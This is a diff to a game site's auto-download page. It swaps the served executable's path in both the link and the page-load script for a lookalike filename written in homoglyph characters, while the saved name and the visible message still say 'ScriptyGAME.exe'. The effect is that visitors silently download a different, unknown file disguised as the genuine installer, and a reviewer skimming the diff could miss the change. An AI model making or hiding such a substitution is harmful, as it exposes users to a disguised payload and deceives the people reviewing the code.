--- a/download/index.html
+++ b/download/index.html
@@ -10,7 +10,7 @@
   <div class="container">
     <h1>Preparing your download...</h1>
     <div class="loader"></div>
-    <p>If the download doesn't start automatically, <a href="/assets/files/ScriptyGAME.exe" class="download-link">click here</a>.</p>
+    <p>If the download doesn't start automatically, <a href="/assets/files/ЅϲʀіρτуᏀᎪⅯЕ.exe" class="download-link">click here</a>.</p>
     <p id="openMessage" style="display:none; color: #fff; font-size: 16px; margin-top: 20px;">Once downloaded, you can open <strong>ScriptyGAME.exe</strong>.</p>
   </div>
 
@@ -18,7 +18,7 @@
 
   <script>
     window.onload = function () {
-      const downloadUrl = "/assets/files/ScriptyGAME.exe";
+      const downloadUrl = "/assets/files/ЅϲʀіρτуᏀᎪⅯЕ.exe";
       const link = document.createElement('a');
       link.href = downloadUrl;
       link.download = "ScriptyGAME.exe";
@@ -27,7 +27,6 @@
       link.click();
       document.body.removeChild(link);
 
-      // Show message after download starts
       const openMessage = document.getElementById('openMessage');
       openMessage.style.display = 'block';
     };
